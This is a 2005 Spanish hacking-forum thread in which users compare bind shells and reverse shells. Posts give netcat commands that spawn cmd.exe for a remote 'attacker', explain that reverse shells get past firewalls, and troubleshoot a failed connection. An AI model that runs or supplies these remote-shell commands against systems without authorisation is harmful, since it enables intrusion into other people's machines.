Autor Tema: ¿Qué diferencia hay shell directa y shell reverse?Ventajas?  (Leído 4458 veces)

Desconectado sharkblack

  • Member
  • ***
  • Mensajes: 377
¿Qué diferencia hay shell directa y shell reverse?Ventajas?
« en: 23 de Julio de 2005, 11:28:45 pm »
A ver si alguien me pueden explicar esto, que diferencia hay entre hacer una shell directa y una shell reverse, me refiero que ventaja tiene o cuales las caracteristicas por la que se usa uno u otro. Gracias. Espero haberme explicado bien.

Ejemplo:

Shell directa.

Victima: nc -l -p 9797 -d -e cmd.exe
Atacante: nc 10.10.0.80 9797

Shell reverse.

Atacante: nc -l -p 9797 -vv
Victima: nc -d -e cmd.exe 10.10.0.69 9797

ip de ejemplos: 10.10.0.80 ip victima y 10.10.0.69 ip atacante.

Desconectado jirho

  • Member
  • ***
  • Mensajes: 303
Re: ¿Qué diferencia hay shell directa y shell reverse?Ventaj
« Respuesta #1 en: 25 de Julio de 2005, 09:45:10 pm »
...cuando entras a un equipo y dejas un shell, lo "normal" es que tu te conectes al equipo, pero cuando no puedes hacerlo porque el firewall o el router hace un filtro non podras conectarte, la reverse shell, lo que hace es...si yo no me puedo conectar a la maquina, pues que ella se conecte a mi...
[root@local_host jirho]#Conecting to underground zone...:superman:

http://www.hackeando.com/gifs/logomini.gif

Desconectado sharkblack

  • Member
  • ***
  • Mensajes: 377
¿Qué diferencia hay shell directa y shell reverse?Ventajas?
« Respuesta #2 en: 26 de Julio de 2005, 11:16:49 am »
Bien, aclarado. La cuestión es que he intentado hacerlo reverse, pero no me conecta. Me explico, tengo un ordenador A sin firewall, y el B con solo el firewall del WXP.

Intento dejar a la escucha el equipo B un puerto, he intento conectar desde el equipo A al equipo B, y no hay manera, no lo entiendo, no creo que el firewall del XP no me deje conectar.¿o es posible que sea el firewall? cuando permito ejecutar el netcat en el equipo B.

Desconectado sharkblack

  • Member
  • ***
  • Mensajes: 377
¿Qué diferencia hay shell directa y shell reverse?Ventajas?
« Respuesta #3 en: 29 de Julio de 2005, 11:32:32 pm »
Bueno, tengo problemas para conectar netcat, ya que intento hacer una conexión reverse, y no hay manera. Esto es lo que hago: (a ver en qué estoy fallando).

Ordenador A:

nc -vv -l -p 6000

Ordenador B:

nc -d -e cmd.exe 192.168.0.1 6000

por que no hay manera de conectar?, lo que si lo hago directo si me vá, pero si lo hago en reverse, se queda escuchando el ordenador A, y nada.......


Por favor, ruego me aclaren la duda, muchas gracias.

 

Aviso Legal | Política de Privacidad | Política de Cookies

el contenido de la web se rige bajo licencia
Creative Commons License